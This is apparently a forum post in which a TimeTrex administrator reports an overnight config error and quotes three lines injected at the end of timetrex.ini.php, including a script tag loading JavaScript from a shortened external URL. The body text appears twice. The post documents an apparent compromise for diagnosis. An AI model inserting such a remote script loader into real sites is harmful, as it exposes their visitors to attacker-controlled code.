timetrex.ini.php Syntax Error Overnight
Posted: Tue May 16, 2023 1:59 am
Good Morning,
We have been running TimeTrex Community Edition for many years generally without issue, including automatic upgrades - as of approximately midnight today (known as a user attempted to log out at 00:10), TimeTrex started displaying a basic raw text error message as below:
'ERROR: Config file (/var/www/[DOMAIN REDACTED]/includes/../timetrex.ini.php) contains a syntax error! If your passwords contain special characters you need to wrap them in double quotes, ie:
password = "test!1!me"'
I examined the timetrex.ini.php file and initially could not see any issues, until I compared it to a copy taken from last night's backup - the only difference was at the very end of the file, where the following lines appear:
ob_start();
?>
<script src="https://9ge.ge/zrq0j4" type="text/javascript"></script>
This seemed a bit odd and also mildly concerning, so in a sandboxed environment I checked out the link and it appears to be a URL shortner site, but the link in particular goes to a blank file. I commented out the 3 lines from the ini.php file, and TimeTrex now loads correctly.
I've logged in and can't see any upgrades that occured last night, so I'm a bit confused what's going on here?
The issue is fixed by commenting out those lines, however I'd like to get a root cause analyis if possible.
Kind regards,
Iain.
We have been running TimeTrex Community Edition for many years generally without issue, including automatic upgrades - as of approximately midnight today (known as a user attempted to log out at 00:10), TimeTrex started displaying a basic raw text error message as below:
'ERROR: Config file (/var/www/[DOMAIN REDACTED]/includes/../timetrex.ini.php) contains a syntax error! If your passwords contain special characters you need to wrap them in double quotes, ie:
password = "test!1!me"'
I examined the timetrex.ini.php file and initially could not see any issues, until I compared it to a copy taken from last night's backup - the only difference was at the very end of the file, where the following lines appear:
ob_start();
?>
<script src="https://9ge.ge/zrq0j4" type="text/javascript"></script>
This seemed a bit odd and also mildly concerning, so in a sandboxed environment I checked out the link and it appears to be a URL shortner site, but the link in particular goes to a blank file. I commented out the 3 lines from the ini.php file, and TimeTrex now loads correctly.
I've logged in and can't see any upgrades that occured last night, so I'm a bit confused what's going on here?
The issue is fixed by commenting out those lines, however I'd like to get a root cause analyis if possible.
Kind regards,
Iain.